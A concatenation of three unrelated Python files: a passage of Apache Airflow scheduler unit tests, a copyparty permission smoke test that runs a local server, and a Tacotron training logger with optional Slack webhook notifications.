scheduler.manage_slas(dag=dag, session=session)
mock_log().exception.assert_called_with(
'Could not send SLA Miss email notification for DAG %s',
'test_sla_miss')
def test_retry_still_in_executor(self):
"""
Checks if the scheduler does not put a task in limbo, when a task is retried
but is still present in the executor.
"""
executor = TestExecutor()
dagbag = DagBag(executor=executor)
dagbag.dags.clear()
dagbag.executor = executor
dag = DAG(
dag_id='test_retry_still_in_executor',
start_date=DEFAULT_DATE,
schedule_interval="@once")
dag_task1 = BashOperator(
task_id='test_retry_handling_op',
bash_command='exit 1',
retries=1,
dag=dag,
owner='airflow')
dag.clear()
dag.is_subdag = False
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
orm_dag.is_paused = False
session.merge(orm_dag)
session.commit()
dagbag.bag_dag(dag=dag, root_dag=dag, parent_dag=dag)
@mock.patch('airflow.models.DagBag', return_value=dagbag)
@mock.patch('airflow.models.DagBag.collect_dags')
def do_schedule(function, function2):
# Use a empty file since the above mock will return the
# expected DAGs. Also specify only a single file so that it doesn't
# try to schedule the above DAG repeatedly.
scheduler = SchedulerJob(num_runs=1,
executor=executor,
subdir=os.path.join(settings.DAGS_FOLDER,
"no_dags.py"))
scheduler.heartrate = 0
scheduler.run()
do_schedule()
self.assertEqual(1, len(executor.queued_tasks))
def run_with_error(task):
try:
task.run()
except AirflowException:
pass
ti_tuple = six.next(six.itervalues(executor.queued_tasks))
(command, priority, queue, simple_ti) = ti_tuple
ti = simple_ti.construct_task_instance()
ti.task = dag_task1
self.assertEqual(ti.try_number, 1)
# fail execution
run_with_error(ti)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
self.assertEqual(ti.try_number, 2)
ti.refresh_from_db(lock_for_update=True, session=session)
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
# do not schedule
do_schedule()
self.assertTrue(executor.has_task(ti))
ti.refresh_from_db()
# removing self.assertEqual(ti.state, State.SCHEDULED)
# as scheduler will move state from SCHEDULED to QUEUED
# now the executor has cleared and it should be allowed the re-queue,
# but tasks stay in the executor.queued_tasks after executor.heartbeat()
# will be set back to SCHEDULED state
executor.queued_tasks.clear()
do_schedule()
ti.refresh_from_db()
self.assertEqual(ti.state, State.SCHEDULED)
# To verify that task does get re-queued.
executor.queued_tasks.clear()
executor.do_update = True
do_schedule()
ti.refresh_from_db()
self.assertIn(ti.state, [State.RUNNING, State.SUCCESS])
@unittest.skipUnless("INTEGRATION" in os.environ, "Can only run end to end")
def test_retry_handling_job(self):
"""
Integration test of the scheduler not accidentally resetting
the try_numbers for a task
"""
dag = self.dagbag.get_dag('test_retry_handling_job')
dag_task1 = dag.get_task("test_retry_handling_op")
dag.clear()
scheduler = SchedulerJob(dag_id=dag.dag_id,
num_runs=1)
scheduler.heartrate = 0
scheduler.run()
session = settings.Session()
ti = session.query(TI).filter(TI.dag_id == dag.dag_id,
TI.task_id == dag_task1.task_id).first()
# make sure the counter has increased
self.assertEqual(ti.try_number, 2)
self.assertEqual(ti.state, State.UP_FOR_RETRY)
def test_scheduler_run_duration(self):
"""
Verifies that the scheduler run duration limit is followed.
"""
dag_id = 'test_start_date_scheduling'
dag = self.dagbag.get_dag(dag_id)
dag.clear()
self.assertTrue(dag.start_date > DEFAULT_DATE)
expected_run_duration = 5
start_time = timezone.utcnow()
scheduler = SchedulerJob(dag_id,
run_duration=expected_run_duration)
scheduler.run()
end_time = timezone.utcnow()
run_duration = (end_time - start_time).total_seconds()
logging.info("Test ran in %.2fs, expected %.2fs",
run_duration,
expected_run_duration)
# 5s to wait for child process to exit, 1s dummy sleep
# in scheduler loop to prevent excessive logs and 1s for last loop to finish.
self.assertLess(run_duration - expected_run_duration, 6.0)
def test_dag_with_system_exit(self):
"""
Test to check that a DAG with a system.exit() doesn't break the scheduler.
"""
dag_id = 'exit_test_dag'
dag_ids = [dag_id]
dag_directory = os.path.join(settings.DAGS_FOLDER,
"..",
"dags_with_system_exit")
dag_file = os.path.join(dag_directory,
'b_test_scheduler_dags.py')
dagbag = DagBag(dag_folder=dag_file)
for dag_id in dag_ids:
dag = dagbag.get_dag(dag_id)
dag.clear()
scheduler = SchedulerJob(dag_ids=dag_ids,
subdir=dag_directory,
num_runs=1)
scheduler.run()
with create_session() as session:
self.assertEqual(
len(session.query(TI).filter(TI.dag_id == dag_id).all()), 1)
def test_dag_get_active_runs(self):
"""
Test to check that a DAG returns its active runs
"""
now = timezone.utcnow()
six_hours_ago_to_the_hour = \
(now - datetime.timedelta(hours=6)).replace(minute=0, second=0, microsecond=0)
START_DATE = six_hours_ago_to_the_hour
DAG_NAME1 = 'get_active_runs_test'
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': START_DATE
}
dag1 = DAG(DAG_NAME1,
schedule_interval='* * * * *',
max_active_runs=1,
default_args=default_args
)
run_this_1 = DummyOperator(task_id='run_this_1', dag=dag1)
run_this_2 = DummyOperator(task_id='run_this_2', dag=dag1)
run_this_2.set_upstream(run_this_1)
run_this_3 = DummyOperator(task_id='run_this_3', dag=dag1)
run_this_3.set_upstream(run_this_2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag1.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
scheduler = SchedulerJob()
dag1.clear()
dr = scheduler.create_dag_run(dag1)
# We had better get a dag run
self.assertIsNotNone(dr)
execution_date = dr.execution_date
running_dates = dag1.get_active_runs()
try:
running_date = running_dates[0]
except Exception:
running_date = 'Except'
self.assertEqual(execution_date, running_date, 'Running Date must match Execution Date')
def test_dag_catchup_option(self):
"""
Test to check that a DAG with catchup = False only schedules beginning now, not back to the start date
"""
def setup_dag(dag_id, schedule_interval, start_date, catchup):
default_args = {
'owner': 'airflow',
'depends_on_past': False,
'start_date': start_date
}
dag = DAG(dag_id,
schedule_interval=schedule_interval,
max_active_runs=1,
catchup=catchup,
default_args=default_args)
t1 = DummyOperator(task_id='t1', dag=dag)
t2 = DummyOperator(task_id='t2', dag=dag)
t2.set_upstream(t1)
t3 = DummyOperator(task_id='t3', dag=dag)
t3.set_upstream(t2)
session = settings.Session()
orm_dag = DagModel(dag_id=dag.dag_id)
session.merge(orm_dag)
session.commit()
session.close()
return dag
now = timezone.utcnow()
six_hours_ago_to_the_hour = (now - datetime.timedelta(hours=6)).replace(
minute=0, second=0, microsecond=0)
half_an_hour_ago = now - datetime.timedelta(minutes=30)
two_hours_ago = now - datetime.timedelta(hours=2)
scheduler = SchedulerJob()
dag1 = setup_dag(dag_id='dag_with_catchup',
schedule_interval='* * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=True)
default_catchup = configuration.conf.getboolean('scheduler', 'catchup_by_default')
self.assertEqual(default_catchup, True)
self.assertEqual(dag1.catchup, True)
dag2 = setup_dag(dag_id='dag_without_catchup_ten_minute',
schedule_interval='*/10 * * * *',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag2)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last half an hour, not 6 hours ago
self.assertGreater(dr.execution_date, half_an_hour_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag3 = setup_dag(dag_id='dag_without_catchup_hourly',
schedule_interval='@hourly',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag3)
# We had better get a dag run
self.assertIsNotNone(dr)
# The DR should be scheduled in the last 2 hours, not 6 hours ago
self.assertGreater(dr.execution_date, two_hours_ago)
# The DR should be scheduled BEFORE now
self.assertLess(dr.execution_date, timezone.utcnow())
dag4 = setup_dag(dag_id='dag_without_catchup_once',
schedule_interval='@once',
start_date=six_hours_ago_to_the_hour,
catchup=False)
dr = scheduler.create_dag_run(dag4)
self.assertIsNotNone(dr)
def test_add_unparseable_file_before_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_add_unparseable_file_after_sched_start_creates_import_error(self):
dags_folder = mkdtemp()
try:
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 1)".format(TEMP_DAG_FILENAME))
def test_no_import_errors_with_parseable_dag(self):
try:
dags_folder = mkdtemp()
parseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
with open(parseable_filename, 'w') as parseable_file:
parseable_file.writelines(PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_new_import_error_replaces_old(self):
try:
dags_folder = mkdtemp()
unparseable_filename = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Generate replacement import error (the error will be on the second line now)
with open(unparseable_filename, 'w') as unparseable_file:
unparseable_file.writelines(
PARSEABLE_DAG_FILE_CONTENTS +
os.linesep +
UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 1)
import_error = import_errors[0]
self.assertEqual(import_error.filename,
unparseable_filename)
self.assertEqual(import_error.stacktrace,
"invalid syntax ({}, line 2)".format(TEMP_DAG_FILENAME))
def test_remove_error_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
# Remove the import error from the file
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(
PARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
session = settings.Session()
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_remove_file_clears_import_error(self):
try:
dags_folder = mkdtemp()
filename_to_parse = os.path.join(dags_folder, TEMP_DAG_FILENAME)
# Generate original import error
with open(filename_to_parse, 'w') as file_to_parse:
file_to_parse.writelines(UNPARSEABLE_DAG_FILE_CONTENTS)
self.run_single_scheduler_loop_with_no_dags(dags_folder)
finally:
shutil.rmtree(dags_folder)
# Rerun the scheduler once the dag file has been removed
self.run_single_scheduler_loop_with_no_dags(dags_folder)
with create_session() as session:
import_errors = session.query(errors.ImportError).all()
self.assertEqual(len(import_errors), 0)
def test_list_py_file_paths(self):
"""
[JIRA-1357] Test the 'list_py_file_paths' function used by the
scheduler to list and load DAGs.
"""
detected_files = set()
expected_files = set()
# No_dags is empty, _invalid_ is ignored by .airflowignore
ignored_files = [
'no_dags.py',
'test_invalid_cron.py',
'test_zip_invalid_cron.zip',
]
for file_name in os.listdir(TEST_DAGS_FOLDER):
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ignored_files:
expected_files.add(
'{}/{}'.format(TEST_DAGS_FOLDER, file_name))
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=False):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
example_dag_folder = airflow.example_dags.__path__[0]
for root, dirs, files in os.walk(example_dag_folder):
for file_name in files:
if file_name.endswith('.py') or file_name.endswith('.zip'):
if file_name not in ['__init__.py']:
expected_files.add(os.path.join(root, file_name))
detected_files.clear()
for file_path in list_py_file_paths(TEST_DAGS_FOLDER, include_examples=True):
detected_files.add(file_path)
self.assertEqual(detected_files, expected_files)
def test_reset_orphaned_tasks_nothing(self):
"""Try with nothing. """
scheduler = SchedulerJob()
session = settings.Session()
self.assertEqual(
0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_external_triggered_dag(self):
dag_id = 'test_reset_orphaned_tasks_external_triggered_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
dr1.state = State.RUNNING
ti.state = State.SCHEDULED
dr1.external_trigger = True
session.merge(ti)
session.merge(dr1)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(session=session)
self.assertEqual(1, len(reset_tis))
def test_reset_orphaned_tasks_backfill_dag(self):
dag_id = 'test_reset_orphaned_tasks_backfill_dag'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag, session=session)
ti = dr1.get_task_instances(session=session)[0]
ti.state = State.SCHEDULED
dr1.state = State.RUNNING
dr1.run_id = BackfillJob.ID_PREFIX + '_sdfsfdfsd'
session.merge(ti)
session.merge(dr1)
session.commit()
self.assertTrue(dr1.is_backfill)
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_specified_dagrun(self):
"""Try to reset when we specify a dagrun and ensure nothing else is."""
dag_id = 'test_reset_orphaned_tasks_specified_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
# make two dagruns, only reset for one
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
dr2.state = State.RUNNING
ti1 = dr1.get_task_instances(session=session)[0]
ti2 = dr2.get_task_instances(session=session)[0]
ti1.state = State.SCHEDULED
ti2.state = State.SCHEDULED
session.merge(ti1)
session.merge(ti2)
session.merge(dr1)
session.merge(dr2)
session.commit()
reset_tis = scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr2, session=session)
self.assertEqual(1, len(reset_tis))
ti1.refresh_from_db(session=session)
ti2.refresh_from_db(session=session)
self.assertEqual(State.SCHEDULED, ti1.state)
self.assertEqual(State.NONE, ti2.state)
def test_reset_orphaned_tasks_nonexistent_dagrun(self):
"""Make sure a task in an orphaned state is not reset if it has no dagrun. """
dag_id = 'test_reset_orphaned_tasks_nonexistent_dagrun'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
task = DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
session.add(ti)
session.commit()
ti.refresh_from_db()
ti.state = State.SCHEDULED
session.merge(ti)
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_no_orphans(self):
dag_id = 'test_reset_orphaned_tasks_no_orphans'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
tis = dr1.get_task_instances(session=session)
tis[0].state = State.RUNNING
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
tis[0].refresh_from_db()
self.assertEqual(State.RUNNING, tis[0].state)
def test_reset_orphaned_tasks_non_running_dagruns(self):
"""Ensure orphaned tasks with non-running dagruns are not reset."""
dag_id = 'test_reset_orphaned_tasks_non_running_dagruns'
dag = DAG(dag_id=dag_id, start_date=DEFAULT_DATE, schedule_interval='@daily')
task_id = dag_id + '_task'
DummyOperator(task_id=task_id, dag=dag)
scheduler = SchedulerJob()
session = settings.Session()
dr1 = scheduler.create_dag_run(dag)
dr1.state = State.SUCCESS
tis = dr1.get_task_instances(session=session)
self.assertEqual(1, len(tis))
tis[0].state = State.SCHEDULED
session.merge(dr1)
session.merge(tis[0])
session.commit()
self.assertEqual(0, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
def test_reset_orphaned_tasks_with_orphans(self):
"""Create dagruns and esnure only ones with correct states are reset."""
prefix = 'scheduler_job_test_test_reset_orphaned_tasks'
states = [State.QUEUED, State.SCHEDULED, State.NONE, State.RUNNING, State.SUCCESS]
states_to_reset = [State.QUEUED, State.SCHEDULED, State.NONE]
dag = DAG(dag_id=prefix,
start_date=DEFAULT_DATE,
schedule_interval="@daily")
tasks = []
for i in range(len(states)):
task_id = "{}_task_{}".format(prefix, i)
task = DummyOperator(task_id=task_id, dag=dag)
tasks.append(task)
scheduler = SchedulerJob()
session = settings.Session()
# create dagruns
dr1 = scheduler.create_dag_run(dag)
dr2 = scheduler.create_dag_run(dag)
dr1.state = State.RUNNING
dr2.state = State.SUCCESS
session.merge(dr1)
session.merge(dr2)
session.commit()
# create taskinstances and set states
dr1_tis = []
dr2_tis = []
for i, (task, state) in enumerate(zip(tasks, states)):
ti1 = TI(task, dr1.execution_date)
ti2 = TI(task, dr2.execution_date)
ti1.refresh_from_db()
ti2.refresh_from_db()
ti1.state = state
ti2.state = state
dr1_tis.append(ti1)
dr2_tis.append(ti2)
session.merge(ti1)
session.merge(ti2)
session.commit()
self.assertEqual(2, len(scheduler.reset_state_for_orphaned_tasks(session=session)))
for ti in dr1_tis + dr2_tis:
ti.refresh_from_db()
# running dagrun should be reset
for state, ti in zip(states, dr1_tis):
if state in states_to_reset:
self.assertIsNone(ti.state)
else:
self.assertEqual(state, ti.state)
# otherwise not
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
for state, ti in zip(states, dr1_tis):
ti.state = state
session.commit()
scheduler.reset_state_for_orphaned_tasks(filter_by_dag_run=dr1, session=session)
# check same for dag_run version
for state, ti in zip(states, dr2_tis):
self.assertEqual(state, ti.state)
session.close()
|
smoketest.py
|
import os
import sys
import time
import shlex
import shutil
import signal
import tempfile
import requests
import threading
import subprocess as sp
CPP = []
class Cpp(object):
def __init__(self, args):
args = [sys.executable, "-m", "copyparty"] + args
print(" ".join([shlex.quote(x) for x in args]))
self.ls_pre = set(list(os.listdir()))
self.p = sp.Popen(args)
# , stdout=sp.PIPE, stderr=sp.PIPE)
self.t = threading.Thread(target=self._run)
self.t.daemon = True
self.t.start()
def _run(self):
self.so, self.se = self.p.communicate()
def stop(self, wait):
if wait:
os.kill(self.p.pid, signal.SIGINT)
self.t.join(timeout=2)
else:
self.p.kill() # macos py3.8
def clean(self):
t = os.listdir()
for f in t:
if f not in self.ls_pre and f.startswith("up."):
os.unlink(f)
def await_idle(self, ub, timeout):
req = ["scanning</td><td>False", "hash-q</td><td>0", "tag-q</td><td>0"]
lim = int(timeout * 10)
u = ub + "?h"
for n in range(lim):
try:
time.sleep(0.1)
r = requests.get(u, timeout=0.1)
for x in req:
if x not in r.text:
print("ST: {}/{} miss {}".format(n, lim, x))
raise Exception()
print("ST: idle")
return
except:
pass
def tc1(vflags):
ub = "http://127.0.0.1:4321/"
td = os.path.join("srv", "smoketest")
try:
shutil.rmtree(td)
except:
if os.path.exists(td):
raise
for _ in range(10):
try:
os.mkdir(td)
except:
time.sleep(0.1) # win10
assert os.path.exists(td)
vidp = os.path.join(tempfile.gettempdir(), "smoketest.h264")
if not os.path.exists(vidp):
cmd = "ffmpeg -f lavfi -i testsrc=48x32:3 -t 1 -c:v libx264 -tune animation -preset veryslow -crf 69"
sp.check_call(cmd.split(" ") + [vidp])
with open(vidp, "rb") as f:
ovid = f.read()
args = [
"-p4321",
"-e2dsa",
"-e2tsr",
"--no-mutagen",
"--th-ff-jpg",
"--hist",
os.path.join(td, "dbm"),
]
pdirs = []
hpaths = {}
for d1 in ["r", "w", "a"]:
pdirs.append("{}/{}".format(td, d1))
pdirs.append("{}/{}/j".format(td, d1))
for d2 in ["r", "w", "a", "c"]:
d = os.path.join(td, d1, "j", d2)
pdirs.append(d)
os.makedirs(d)
pdirs = [x.replace("\\", "/") for x in pdirs]
udirs = [x.split("/", 2)[2] for x in pdirs]
perms = [x.rstrip("cj/")[-1] for x in pdirs]
perms = ["rw" if x == "a" else x for x in perms]
for pd, ud, p in zip(pdirs, udirs, perms):
if ud[-1] == "j" or ud[-1] == "c":
continue
hp = None
if pd.endswith("st/a"):
hp = hpaths[ud] = os.path.join(td, "db1")
elif pd[:-1].endswith("a/j/"):
hpaths[ud] = os.path.join(td, "dbm")
hp = None
else:
hp = "-"
hpaths[ud] = os.path.join(pd, ".hist")
arg = "{}:{}:{}".format(pd, ud, p)
if hp:
arg += ":c,hist=" + hp
args += ["-v", arg + vflags]
# return
cpp = Cpp(args)
CPP.append(cpp)
cpp.await_idle(ub, 3)
for d, p in zip(udirs, perms):
vid = ovid + "\n{}".format(d).encode("utf-8")
r = requests.post(
ub + d,
data={"act": "bput"},
files={"f": (d.replace("/", "") + ".h264", vid)},
)
c = r.status_code
if c == 200 and p not in ["w", "rw"]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
elif c == 403 and p not in ["r"]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
elif c not in [200, 403]:
raise Exception("post {} with perm {} at {}".format(c, p, d))
cpp.clean()
# GET permission
for d, p in zip(udirs, perms):
u = "{}{}/{}.h264".format(ub, d, d.replace("/", ""))
r = requests.get(u)
ok = bool(r)
if ok != (p in ["rw"]):
raise Exception("get {} with perm {} at {}".format(ok, p, u))
# stat filesystem
for d, p in zip(pdirs, perms):
u = "{}/{}.h264".format(d, d.split("test/")[-1].replace("/", ""))
ok = os.path.exists(u)
if ok != (p in ["rw", "w"]):
raise Exception("stat {} with perm {} at {}".format(ok, p, u))
# GET thumbnail, vreify contents
for d, p in zip(udirs, perms):
u = "{}{}/{}.h264?th=j".format(ub, d, d.replace("/", ""))
r = requests.get(u)
ok = bool(r and r.content[:3] == b"\xff\xd8\xff")
if ok != (p in ["rw"]):
raise Exception("thumb {} with perm {} at {}".format(ok, p, u))
# check tags
cpp.await_idle(ub, 5)
for d, p in zip(udirs, perms):
u = "{}{}?ls".format(ub, d)
r = requests.get(u)
j = r.json() if r else False
tag = None
if j:
for f in j["files"]:
tag = tag or f["tags"].get("res")
r_ok = bool(j)
w_ok = bool(r_ok and j.get("files"))
if not r_ok or w_ok != (p in ["rw"]):
raise Exception("ls {} with perm {} at {}".format(ok, p, u))
if (tag and p != "rw") or (not tag and p == "rw"):
raise Exception("tag {} with perm {} at {}".format(tag, p, u))
if tag is not None and tag != "48x32":
raise Exception("tag [{}] at {}".format(tag, u))
cpp.stop(True)
def run(tc, *a):
try:
tc(*a)
finally:
try:
CPP[0].stop(False)
except:
pass
def main():
run(tc1, "")
run(tc1, ":c,fk")
if __name__ == "__main__":
main()
|
infolog.py
|
import atexit
from datetime import datetime
import json
from threading import Thread
from urllib.request import Request, urlopen
_format = '%Y-%m-%d %H:%M:%S.%f'
_file = None
_run_name = None
_slack_url = None
def init(filename, run_name, slack_url=None):
global _file, _run_name, _slack_url
_close_logfile()
_file = open(filename, 'a')
_file = open(filename, 'a')
_file.write('\n-----------------------------------------------------------------\n')
_file.write('Starting new {} training run\n'.format(run_name))
_file.write('-----------------------------------------------------------------\n')
_run_name = run_name
_slack_url = slack_url
def log(msg, end='\n', slack=False):
print(msg, end=end)
if _file is not None:
_file.write('[%s] %s\n' % (datetime.now().strftime(_format)[:-3], msg))
if slack and _slack_url is not None:
Thread(target=_send_slack, args=(msg,)).start()
def _close_logfile():
global _file
if _file is not None:
_file.close()
_file = None
def _send_slack(msg):
req = Request(_slack_url)
req.add_header('Content-Type', 'application/json')
urlopen(req, json.dumps({
'username': 'tacotron',
'icon_emoji': ':taco:',
'text': '*%s*: %s' % (_run_name, msg)
}).encode())
atexit.register(_close_logfile)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.